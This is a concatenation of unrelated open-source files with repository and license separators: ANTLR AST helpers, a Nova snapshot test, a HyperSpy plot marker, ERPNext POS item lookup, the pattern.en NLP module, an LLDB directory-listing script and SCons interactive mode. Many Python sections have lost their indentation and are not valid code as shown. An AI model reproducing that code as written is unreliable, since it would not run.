### enter the class
self._classmap[tokenType] = className
def getASTNodeType(self,tokenType):
"""
For a given token type return the AST node type. First we
lookup a mapping table, second we try _class
and finally we resolve to "antlr.CommonAST".
"""
# first
if self._classmap:
try:
c = self._classmap[tokenType]
if c:
return c
            except KeyError:
pass
# second
if self._class:
return self._class
# default
return CommonAST
### methods that have been moved to file scope - just listed
### here to be somewhat consistent with original API
def dup(self,t):
return antlr.dup(t,self)
def dupList(self,t):
return antlr.dupList(t,self)
def dupTree(self,t):
return antlr.dupTree(t,self)
### methods moved to other classes
### 1. makeASTRoot -> Parser
### 2. addASTChild -> Parser
### non-standard: create alias for longish method name
maptype = setTokenTypeASTNodeType
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTVisitor ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTVisitor(object):
def __init__(self,*args):
pass
def visit(self,ast):
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### static methods and variables ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
ASTNULL = ASTNULLType()
### wh: moved from ASTFactory as there's nothing ASTFactory-specific
### in this method.
def make(*nodes):
if not nodes:
return None
for i in xrange(0,len(nodes)):
node = nodes[i]
if node:
assert isinstance(node,AST)
root = nodes[0]
tail = None
if root:
root.setFirstChild(None)
for i in xrange(1,len(nodes)):
if not nodes[i]:
continue
if not root:
root = tail = nodes[i]
elif not tail:
root.setFirstChild(nodes[i])
tail = root.getFirstChild()
else:
tail.setNextSibling(nodes[i])
tail = tail.getNextSibling()
### Chase tail to last sibling
while tail.getNextSibling():
tail = tail.getNextSibling()
return root
def dup(t,factory):
if not t:
return None
if factory:
dup_t = factory.create(t.__class__)
else:
raise TypeError("dup function requires ASTFactory argument")
dup_t.initialize(t)
return dup_t
def dupList(t,factory):
result = dupTree(t,factory)
nt = result
while t:
## for each sibling of the root
t = t.getNextSibling()
nt.setNextSibling(dupTree(t,factory))
nt = nt.getNextSibling()
return result
def dupTree(t,factory):
result = dup(t,factory)
if t:
result.setFirstChild(dupList(t.getFirstChild(),factory))
return result
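### --- Illustrative sketch (not part of the original antlr API) ----------
### A minimal demo of how the module-level helpers above compose, assuming
### the CommonAST/ASTFactory definitions earlier in this file:
def _demo_make_and_dup():
    factory = ASTFactory()
    a = factory.create(1, "a")     # resolved via getASTNodeType -> CommonAST
    b = factory.create(2, "b")
    c = factory.create(3, "c")
    root = make(a, b, c)           # b and c become child siblings under a
    copy = dupTree(root, factory)  # deep copy of root and all its children
    return root, copy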
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
### $Id: antlr.py 3750 2009-02-13 00:13:04Z sjmachin $
# Local Variables: ***
# mode: python ***
# py-indent-offset: 4 ***
# End: ***
| apache-2.0 |
watonyweng/nova | nova/tests/functional/v3/test_assisted_volume_snapshots.py | 3 | 2837 | # Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.compute import api as compute_api
from nova.tests.functional.v3 import test_servers
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class AssistedVolumeSnapshotsJsonTests(test_servers.ServersSampleBase):
extension_name = "os-assisted-volume-snapshots"
# TODO(gmann): Overriding '_api_version' till all functional tests
# are merged between v2 and v2.1. After that base class variable
# itself can be changed to 'v2'
_api_version = 'v2'
def _get_flags(self):
f = super(AssistedVolumeSnapshotsJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.'
'assisted_volume_snapshots.Assisted_volume_snapshots')
return f
def test_create(self):
"""Create a volume snapshots."""
self.stubs.Set(compute_api.API, 'volume_snapshot_create',
fakes.stub_compute_volume_snapshot_create)
subs = {
'volume_id': '521752a6-acf6-4b2d-bc7a-119f9148cd8c',
'snapshot_id': '421752a6-acf6-4b2d-bc7a-119f9148cd8c',
'type': 'qcow2',
'new_file': 'new_file_name'
}
response = self._do_post("os-assisted-volume-snapshots",
"snapshot-create-assisted-req",
subs)
subs.update(self._get_regexes())
self._verify_response("snapshot-create-assisted-resp",
subs, response, 200)
def test_snapshots_delete_assisted(self):
self.stubs.Set(compute_api.API, 'volume_snapshot_delete',
fakes.stub_compute_volume_snapshot_delete)
snapshot_id = '100'
response = self._do_delete(
'os-assisted-volume-snapshots/%s?delete_info='
'{"volume_id":"521752a6-acf6-4b2d-bc7a-119f9148cd8c"}'
% snapshot_id)
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
| apache-2.0 |
magnunor/hyperspy | hyperspy/drawing/_markers/vertical_line.py | 2 | 2501 | # -*- coding: utf-8 -*-
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from hyperspy.drawing.marker import MarkerBase
class VerticalLine(MarkerBase):
"""Vertical line marker that can be added to the signal figure
Parameters
----------
x : array or float
The position of the line. If float, the marker is fixed.
If array, the marker will be updated when navigating. The array should
have the same dimensions in the navigation axes.
    kwargs :
        Keyword arguments: any valid axvline property (i.e. recognized by
        mpl.plot).
Example
-------
>>> s = hs.signals.Signal1D(np.random.random([10, 100]))
>>> m = hs.plot.markers.vertical_line(x=range(10), color='green')
>>> s.add_marker(m)
Adding a marker permanently to a signal
>>> s = hs.signals.Signal1D(np.random.random((100, 100)))
>>> m = hs.plot.markers.vertical_line(x=30)
>>> s.add_marker(m, permanent=True)
"""
def __init__(self, x, **kwargs):
MarkerBase.__init__(self)
lp = {'linewidth': 1, 'color': 'black'}
self.marker_properties = lp
self.set_data(x1=x)
self.set_marker_properties(**kwargs)
self.name = 'vertical_line'
    def __repr__(self):
        string = "<marker.{}, {} (x={},color={})>".format(
            self.__class__.__name__,
            self.name,
            self.get_data_position('x1'),
            self.marker_properties['color'],
        )
        return string
def update(self):
if self.auto_update is False:
return
self.marker.set_xdata(self.get_data_position('x1'))
def _plot_marker(self):
self.marker = self.ax.axvline(self.get_data_position('x1'),
**self.marker_properties)
| gpl-3.0 |
sagar30051991/ozsmart-erp | erpnext/accounts/doctype/sales_invoice/pos.py | 11 | 2008 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
@frappe.whitelist()
def get_items(price_list, sales_or_purchase, item=None):
condition = ""
order_by = ""
args = {"price_list": price_list}
if sales_or_purchase == "Sales":
condition = "i.is_sales_item=1"
else:
condition = "i.is_purchase_item=1"
if item:
# search serial no
item_code = frappe.db.sql("""select name as serial_no, item_code
from `tabSerial No` where name=%s""", (item), as_dict=1)
if item_code:
item_code[0]["name"] = item_code[0]["item_code"]
return item_code
# search barcode
item_code = frappe.db.sql("""select name, item_code from `tabItem`
where barcode=%s""",
(item), as_dict=1)
if item_code:
item_code[0]["barcode"] = item
return item_code
condition += " and ((CONCAT(i.name, i.item_name) like %(name)s) or (i.variant_of like %(name)s) or (i.item_group like %(name)s))"
order_by = """if(locate(%(_name)s, i.name), locate(%(_name)s, i.name), 99999),
if(locate(%(_name)s, i.item_name), locate(%(_name)s, i.item_name), 99999),
if(locate(%(_name)s, i.variant_of), locate(%(_name)s, i.variant_of), 99999),
if(locate(%(_name)s, i.item_group), locate(%(_name)s, i.item_group), 99999),"""
args["name"] = "%%%s%%" % frappe.db.escape(item)
args["_name"] = item.replace("%", "")
# locate function is used to sort by closest match from the beginning of the value
return frappe.db.sql("""select i.name, i.item_name, i.image,
item_det.price_list_rate, item_det.currency
from `tabItem` i LEFT JOIN
(select item_code, price_list_rate, currency from
`tabItem Price` where price_list=%(price_list)s) item_det
ON
(item_det.item_code=i.name or item_det.item_code=i.variant_of)
where
i.has_variants = 0 and
{condition}
order by
{order_by}
i.name
limit 24""".format(condition=condition, order_by=order_by), args, as_dict=1)
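# Illustrative sketch (hypothetical values, not part of the original module):
# fetch Sales items matching "chair" from the "Standard Selling" price list.
# Assumes a bootstrapped Frappe site context.
def _example_get_items():
    return get_items("Standard Selling", "Sales", item="chair")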
| agpl-3.0 |
elkingtonmcb/pattern | pattern/text/en/__init__.py | 21 | 7122 | #### PATTERN | EN ##################################################################################
# -*- coding: utf-8 -*-
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# English linguistical tools using fast regular expressions.
import os
import sys
try:
MODULE = os.path.dirname(os.path.realpath(__file__))
except NameError:
MODULE = ""
sys.path.insert(0, os.path.join(MODULE, "..", "..", "..", ".."))
# Import parser base classes.
from pattern.text import (
Lexicon, Model, Morphology, Context, Parser as _Parser, ngrams, pprint, commandline,
PUNCTUATION
)
# Import parser universal tagset.
from pattern.text import (
penntreebank2universal,
PTB, PENN, UNIVERSAL,
NOUN, VERB, ADJ, ADV, PRON, DET, PREP, ADP, NUM, CONJ, INTJ, PRT, PUNC, X
)
# Import parse tree base classes.
from pattern.text.tree import (
Tree, Text, Sentence, Slice, Chunk, PNPChunk, Chink, Word, table,
SLASH, WORD, POS, CHUNK, PNP, REL, ANCHOR, LEMMA, AND, OR
)
# Import sentiment analysis base classes.
from pattern.text import (
Sentiment as _Sentiment, NOUN, VERB, ADJECTIVE, ADVERB
)
# Import spelling base class.
from pattern.text import (
Spelling
)
# Import verb tenses.
from pattern.text import (
INFINITIVE, PRESENT, PAST, FUTURE,
FIRST, SECOND, THIRD,
SINGULAR, PLURAL, SG, PL,
PROGRESSIVE,
PARTICIPLE
)
# Import inflection functions.
from pattern.text.en.inflect import (
article, referenced, DEFINITE, INDEFINITE,
pluralize, singularize, NOUN, VERB, ADJECTIVE,
grade, comparative, superlative, COMPARATIVE, SUPERLATIVE,
verbs, conjugate, lemma, lexeme, tenses,
predicative, attributive
)
# Import quantification functions.
from pattern.text.en.inflect_quantify import (
number, numerals, quantify, reflect
)
# Import mood & modality functions.
from pattern.text.en.modality import (
mood, INDICATIVE, IMPERATIVE, CONDITIONAL, SUBJUNCTIVE,
modality, uncertain, EPISTEMIC,
negated
)
# Import all submodules.
from pattern.text.en import inflect
from pattern.text.en import wordnet
from pattern.text.en import wordlist
sys.path.pop(0)
#--- ENGLISH PARSER --------------------------------------------------------------------------------
def find_lemmata(tokens):
""" Annotates the tokens with lemmata for plural nouns and conjugated verbs,
where each token is a [word, part-of-speech] list.
"""
for token in tokens:
word, pos, lemma = token[0], token[1], token[0]
# cats => cat
if pos == "NNS":
lemma = singularize(word)
# sat => sit
if pos.startswith(("VB", "MD")):
lemma = conjugate(word, INFINITIVE) or word
token.append(lemma.lower())
return tokens
class Parser(_Parser):
def find_lemmata(self, tokens, **kwargs):
return find_lemmata(tokens)
def find_tags(self, tokens, **kwargs):
if kwargs.get("tagset") in (PENN, None):
kwargs.setdefault("map", lambda token, tag: (token, tag))
if kwargs.get("tagset") == UNIVERSAL:
kwargs.setdefault("map", lambda token, tag: penntreebank2universal(token, tag))
return _Parser.find_tags(self, tokens, **kwargs)
class Sentiment(_Sentiment):
def load(self, path=None):
_Sentiment.load(self, path)
# Map "terrible" to adverb "terribly" (+1% accuracy)
if not path:
for w, pos in dict.items(self):
if "JJ" in pos:
if w.endswith("y"):
w = w[:-1] + "i"
if w.endswith("le"):
w = w[:-2]
p, s, i = pos["JJ"]
self.annotate(w + "ly", "RB", p, s, i)
parser = Parser(
lexicon = os.path.join(MODULE, "en-lexicon.txt"), # A dict of known words => most frequent tag.
frequency = os.path.join(MODULE, "en-frequency.txt"), # A dict of word frequency.
model = os.path.join(MODULE, "en-model.slp"), # A SLP classifier trained on WSJ (01-07).
morphology = os.path.join(MODULE, "en-morphology.txt"), # A set of suffix rules (e.g., -ly = adverb).
context = os.path.join(MODULE, "en-context.txt"), # A set of contextual rules.
entities = os.path.join(MODULE, "en-entities.txt"), # A dict of named entities: John = NNP-PERS.
default = ("NN", "NNP", "CD"),
language = "en"
)
lexicon = parser.lexicon # Expose lexicon.
sentiment = Sentiment(
path = os.path.join(MODULE, "en-sentiment.xml"),
synset = "wordnet_id",
negations = ("no", "not", "n't", "never"),
modifiers = ("RB",),
modifier = lambda w: w.endswith("ly"),
tokenizer = parser.find_tokens,
language = "en"
)
spelling = Spelling(
path = os.path.join(MODULE, "en-spelling.txt")
)
def tokenize(s, *args, **kwargs):
""" Returns a list of sentences, where punctuation marks have been split from words.
"""
return parser.find_tokens(s, *args, **kwargs)
def parse(s, *args, **kwargs):
""" Returns a tagged Unicode string.
"""
return parser.parse(s, *args, **kwargs)
def parsetree(s, *args, **kwargs):
""" Returns a parsed Text from the given string.
"""
return Text(parse(s, *args, **kwargs))
def tree(s, token=[WORD, POS, CHUNK, PNP, REL, LEMMA]):
""" Returns a parsed Text from the given parsed string.
"""
return Text(s, token)
def tag(s, tokenize=True, encoding="utf-8", **kwargs):
""" Returns a list of (token, tag)-tuples from the given string.
"""
tags = []
for sentence in parse(s, tokenize, True, False, False, False, encoding, **kwargs).split():
for token in sentence:
tags.append((token[0], token[1]))
return tags
def keywords(s, top=10, **kwargs):
""" Returns a sorted list of keywords in the given string.
"""
return parser.find_keywords(s, **dict({
"frequency": parser.frequency,
"top": top,
"pos": ("NN",),
"ignore": ("rt",)}, **kwargs))
def suggest(w):
""" Returns a list of (word, confidence)-tuples of spelling corrections.
"""
return spelling.suggest(w)
def polarity(s, **kwargs):
""" Returns the sentence polarity (positive/negative) between -1.0 and 1.0.
"""
return sentiment(s, **kwargs)[0]
def subjectivity(s, **kwargs):
""" Returns the sentence subjectivity (objective/subjective) between 0.0 and 1.0.
"""
return sentiment(s, **kwargs)[1]
def positive(s, threshold=0.1, **kwargs):
""" Returns True if the given sentence has a positive sentiment (polarity >= threshold).
"""
return polarity(s, **kwargs) >= threshold
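def _demo_parse():
    # Illustrative sketch, not part of the original API: exercise the main
    # entry points above; assumes the bundled lexicon files loaded at import.
    s = "The black cat sat on the mat."
    return parse(s), tag(s), keywords(s, top=3)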
split = tree # Backwards compatibility.
#---------------------------------------------------------------------------------------------------
# python -m pattern.en xml -s "The cat sat on the mat." -OTCL
if __name__ == "__main__":
    commandline(parse)
| bsd-3-clause |
DerekSelander/LLDB | lldb_commands/ddp.py | 1 | 5995 | # MIT License
# Copyright (c) 2020 Derik Ramirez
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import lldb
import os
import shlex
import optparse
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand(
'command script add -f ddp.handle_command ddp')
def handle_command(debugger, command, result, internal_dict):
'''
Displays the Document directories for the current app.
    This includes the Data Directory and the Shared directories
    the app can access through its application groups.
'''
command_args = shlex.split(command, posix=True)
parser = generateOptionParser()
try:
(options, args) = parser.parse_args(command_args)
except:
result.SetError(parser.usage)
return
if len(command_args) == 0 or command_args == ['-h']:
parser.print_help()
if options.data_directory or options.all_data_directories:
result.AppendMessage("Data Dir:\n{}".format(getDocumentDirectory()))
if options.all_data_directories:
groups = getApplicationGroups()
for i in groups:
if i == None:
continue
result.AppendMessage("group: {}\ndir: {}".format(i,getSharedDirForGroup(i)))
if options.shared_directory:
result.AppendMessage("Shared Dir for group: {}\n{}".format(options.shared_directory,getSharedDirForGroup(options.shared_directory)))
if options.application_groups:
result.AppendMessage("Application Groups:\n{}".format(getApplicationGroups()))
def executeCommand(command):
debugger = lldb.debugger
process = debugger.GetSelectedTarget().GetProcess()
frame = process.GetSelectedThread().GetSelectedFrame()
target = debugger.GetSelectedTarget()
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(False);
expr_options.SetFetchDynamicValue(lldb.eDynamicCanRunTarget);
expr_options.SetTimeoutInMicroSeconds (30*1000*1000) # 30 second timeout
expr_options.SetTryAllThreads (True)
expr_options.SetUnwindOnError(False)
expr_options.SetGenerateDebugInfo(True)
expr_options.SetLanguage (lldb.eLanguageTypeObjC)
expr_options.SetCoerceResultToId(True)
return frame.EvaluateExpression(command, expr_options)
def getDocumentDirectory():
command_script = r'''
@import ObjectiveC;
@import Foundation;
    [[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0].absoluteString;
'''
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return str(d_sbval.error)
return d_sbval.description
def getSharedDirForGroup(group_name):
command_script = r'''
@import ObjectiveC;
@import Foundation;
[[NSFileManager defaultManager] containerURLForSecurityApplicationGroupIdentifier:@"'''
command_script += group_name + '"]'
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return str(d_sbval.error)
return d_sbval.description
def getApplicationGroups():
command_script = r'''
@import ObjectiveC;
@import Foundation;
// Declare the private SecTask functions
void* (SecTaskCopyValueForEntitlement)(void* task, CFStringRef entitlement, CFErrorRef _Nullable *error);
void* (SecTaskCreateFromSelf)(CFAllocatorRef allocator);
CFErrorRef err = nil;
NSArray* groups = (NSArray *)SecTaskCopyValueForEntitlement(SecTaskCreateFromSelf(NULL), CFSTR("com.apple.security.application-groups"), &err);
groups;
'''
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return []
groups = []
for i in range(d_sbval.GetNumChildren()):
groups.append(d_sbval.GetChildAtIndex(i).description)
return groups
def generateOptionParser():
usage = "usage: %prog [options]"
parser = optparse.OptionParser(usage=usage, prog="ddp")
parser.add_option("-d", "--data_directory",
action="store_true",
default=False,
dest="data_directory",
help="Displays the Data Directory for the current app bundle.")
parser.add_option("-a", "--all_data_directories",
action="store_true",
default=False,
dest="all_data_directories",
help="Displays the Data Directories for the current app bundle.")
parser.add_option("-s", "--shared_directory",
action="store",
default=None,
dest="shared_directory",
help="Displays the Shared data directories the current app bundle has from its shared groups.")
parser.add_option("-g", "--application_groups",
action="store_true",
default=False,
dest="application_groups",
help="Displays application_groups of the current app bundle.")
return parser
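# Illustrative usage from the LLDB prompt (assumes this file is importable):
#   (lldb) command script import ddp.py
#   (lldb) ddp -d    # show the app's Data Directory
#   (lldb) ddp -g    # list the app's application groups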
| gpl-2.0 |
bpsinc-native/src_third_party_scons-2.0.1 | engine/SCons/Script/Interactive.py | 61 | 14083 | #
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Script/Interactive.py 5134 2010/08/16 23:02:40 bdeegan"
__doc__ = """
SCons interactive mode
"""
# TODO:
#
# This has the potential to grow into something with a really big life
# of its own, which might or might not be a good thing. Nevertheless,
# here are some enhancements that will probably be requested some day
# and are worth keeping in mind (assuming this takes off):
#
# - A command to re-read / re-load the SConscript files. This may
# involve allowing people to specify command-line options (e.g. -f,
# -I, --no-site-dir) that affect how the SConscript files are read.
#
# - Additional command-line options on the "build" command.
#
# Of the supported options that seemed to make sense (after a quick
# pass through the list), the ones that seemed likely enough to be
# used are listed in the man page and have explicit test scripts.
#
# These had code changed in Script/Main.py to support them, but didn't
# seem likely to be used regularly, so had no test scripts added:
#
# build --diskcheck=*
# build --implicit-cache=*
# build --implicit-deps-changed=*
# build --implicit-deps-unchanged=*
#
# These look like they should "just work" with no changes to the
# existing code, but like those above, look unlikely to be used and
# therefore had no test scripts added:
#
# build --random
#
# These I'm not sure about. They might be useful for individual
# "build" commands, and may even work, but they seem unlikely enough
# that we'll wait until they're requested before spending any time on
# writing test scripts for them, or investigating whether they work.
#
# build -q [??? is there a useful analog to the exit status?]
# build --duplicate=
# build --profile=
# build --max-drift=
# build --warn=*
# build --Y
#
# - Most of the SCons command-line options that the "build" command
# supports should be settable as default options that apply to all
# subsequent "build" commands. Maybe a "set {option}" command that
# maps to "SetOption('{option}')".
#
# - Need something in the 'help' command that prints the -h output.
#
# - A command to run the configure subsystem separately (must see how
# this interacts with the new automake model).
#
# - Command-line completion of target names; maybe even of SCons options?
# Completion is something that's supported by the Python cmd module,
# so this should be doable without too much trouble.
#
import cmd
import copy
import os
import re
import shlex
import sys
try:
import readline
except ImportError:
pass
class SConsInteractiveCmd(cmd.Cmd):
"""\
build [TARGETS] Build the specified TARGETS and their dependencies.
'b' is a synonym.
clean [TARGETS] Clean (remove) the specified TARGETS and their
dependencies. 'c' is a synonym.
exit Exit SCons interactive mode.
help [COMMAND] Prints help for the specified COMMAND. 'h' and
'?' are synonyms.
shell [COMMANDLINE] Execute COMMANDLINE in a subshell. 'sh' and '!'
are synonyms.
version Prints SCons version information.
"""
synonyms = {
'b' : 'build',
'c' : 'clean',
'h' : 'help',
'scons' : 'build',
'sh' : 'shell',
}
def __init__(self, **kw):
cmd.Cmd.__init__(self)
for key, val in kw.items():
setattr(self, key, val)
if sys.platform == 'win32':
self.shell_variable = 'COMSPEC'
else:
self.shell_variable = 'SHELL'
def default(self, argv):
print "*** Unknown command: %s" % argv[0]
def onecmd(self, line):
line = line.strip()
if not line:
print self.lastcmd
return self.emptyline()
self.lastcmd = line
if line[0] == '!':
line = 'shell ' + line[1:]
elif line[0] == '?':
line = 'help ' + line[1:]
if os.sep == '\\':
line = line.replace('\\', '\\\\')
argv = shlex.split(line)
argv[0] = self.synonyms.get(argv[0], argv[0])
if not argv[0]:
return self.default(line)
else:
try:
func = getattr(self, 'do_' + argv[0])
except AttributeError:
return self.default(argv)
return func(argv)
def do_build(self, argv):
"""\
build [TARGETS] Build the specified TARGETS and their
dependencies. 'b' is a synonym.
"""
import SCons.Node
import SCons.SConsign
import SCons.Script.Main
options = copy.deepcopy(self.options)
options, targets = self.parser.parse_args(argv[1:], values=options)
SCons.Script.COMMAND_LINE_TARGETS = targets
if targets:
SCons.Script.BUILD_TARGETS = targets
else:
# If the user didn't specify any targets on the command line,
# use the list of default targets.
SCons.Script.BUILD_TARGETS = SCons.Script._build_plus_default
nodes = SCons.Script.Main._build_targets(self.fs,
options,
targets,
self.target_top)
if not nodes:
return
# Call each of the Node's alter_targets() methods, which may
# provide additional targets that ended up as part of the build
# (the canonical example being a VariantDir() when we're building
# from a source directory) and which we therefore need their
# state cleared, too.
x = []
for n in nodes:
x.extend(n.alter_targets()[0])
nodes.extend(x)
# Clean up so that we can perform the next build correctly.
#
# We do this by walking over all the children of the targets,
# and clearing their state.
#
# We currently have to re-scan each node to find their
# children, because built nodes have already been partially
# cleared and don't remember their children. (In scons
# 0.96.1 and earlier, this wasn't the case, and we didn't
# have to re-scan the nodes.)
#
# Because we have to re-scan each node, we can't clear the
# nodes as we walk over them, because we may end up rescanning
# a cleared node as we scan a later node. Therefore, only
# store the list of nodes that need to be cleared as we walk
# the tree, and clear them in a separate pass.
#
# XXX: Someone more familiar with the inner workings of scons
# may be able to point out a more efficient way to do this.
SCons.Script.Main.progress_display("scons: Clearing cached node information ...")
seen_nodes = {}
def get_unseen_children(node, parent, seen_nodes=seen_nodes):
def is_unseen(node, seen_nodes=seen_nodes):
return node not in seen_nodes
return list(filter(is_unseen, node.children(scan=1)))
def add_to_seen_nodes(node, parent, seen_nodes=seen_nodes):
seen_nodes[node] = 1
# If this file is in a VariantDir and has a
# corresponding source file in the source tree, remember the
# node in the source tree, too. This is needed in
# particular to clear cached implicit dependencies on the
# source file, since the scanner will scan it if the
# VariantDir was created with duplicate=0.
try:
rfile_method = node.rfile
except AttributeError:
return
else:
rfile = rfile_method()
if rfile != node:
seen_nodes[rfile] = 1
for node in nodes:
walker = SCons.Node.Walker(node,
kids_func=get_unseen_children,
eval_func=add_to_seen_nodes)
n = walker.get_next()
while n:
n = walker.get_next()
for node in seen_nodes.keys():
# Call node.clear() to clear most of the state
node.clear()
# node.clear() doesn't reset node.state, so call
# node.set_state() to reset it manually
node.set_state(SCons.Node.no_state)
node.implicit = None
# Debug: Uncomment to verify that all Taskmaster reference
# counts have been reset to zero.
#if node.ref_count != 0:
# from SCons.Debug import Trace
# Trace('node %s, ref_count %s !!!\n' % (node, node.ref_count))
SCons.SConsign.Reset()
SCons.Script.Main.progress_display("scons: done clearing node information.")
def do_clean(self, argv):
"""\
clean [TARGETS] Clean (remove) the specified TARGETS
and their dependencies. 'c' is a synonym.
"""
return self.do_build(['build', '--clean'] + argv[1:])
def do_EOF(self, argv):
print
self.do_exit(argv)
def _do_one_help(self, arg):
try:
# If help_<arg>() exists, then call it.
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
func = getattr(self, 'do_' + arg)
except AttributeError:
doc = None
else:
doc = self._doc_to_help(func)
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
else:
            doc = self._strip_initial_spaces(func())
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
def _doc_to_help(self, obj):
doc = obj.__doc__
if doc is None:
return ''
return self._strip_initial_spaces(doc)
def _strip_initial_spaces(self, s):
#lines = s.split('\n')
lines = s.split('\n')
spaces = re.match(' *', lines[0]).group(0)
#def strip_spaces(l):
# if l.startswith(spaces):
# l = l[len(spaces):]
# return l
#return '\n'.join([ strip_spaces(l) for l in lines ])
def strip_spaces(l, spaces=spaces):
if l[:len(spaces)] == spaces:
l = l[len(spaces):]
return l
lines = list(map(strip_spaces, lines))
return '\n'.join(lines)
def do_exit(self, argv):
"""\
exit Exit SCons interactive mode.
"""
sys.exit(0)
def do_help(self, argv):
"""\
help [COMMAND] Prints help for the specified COMMAND. 'h'
and '?' are synonyms.
"""
if argv[1:]:
for arg in argv[1:]:
if self._do_one_help(arg):
break
else:
# If bare 'help' is called, print this class's doc
# string (if it has one).
doc = self._doc_to_help(self.__class__)
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
def do_shell(self, argv):
"""\
shell [COMMANDLINE] Execute COMMANDLINE in a subshell. 'sh' and
'!' are synonyms.
"""
import subprocess
argv = argv[1:]
if not argv:
argv = os.environ[self.shell_variable]
try:
# Per "[Python-Dev] subprocess insufficiently platform-independent?"
            # http://mail.python.org/pipermail/python-dev/2008-August/081979.html
# Doing the right thing with an argument list currently
# requires different shell= values on Windows and Linux.
p = subprocess.Popen(argv, shell=(sys.platform=='win32'))
except EnvironmentError, e:
sys.stderr.write('scons: %s: %s\n' % (argv[0], e.strerror))
else:
p.wait()
def do_version(self, argv):
"""\
version Prints SCons version information.
"""
sys.stdout.write(self.parser.version + '\n')
def interact(fs, parser, options, targets, target_top):
c = SConsInteractiveCmd(prompt = 'scons>>> ',
fs = fs,
parser = parser,
options = options,
targets = targets,
target_top = target_top)
c.cmdloop()
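# Illustrative sketch: SCons normally enters this loop via its --interactive
# option; the arguments come from SCons.Script.Main's option parsing, e.g.:
#
#     interact(fs, parser, options, targets, target_top)
#     scons>>> build prog
#     scons>>> clean prog
#     scons>>> exit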
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
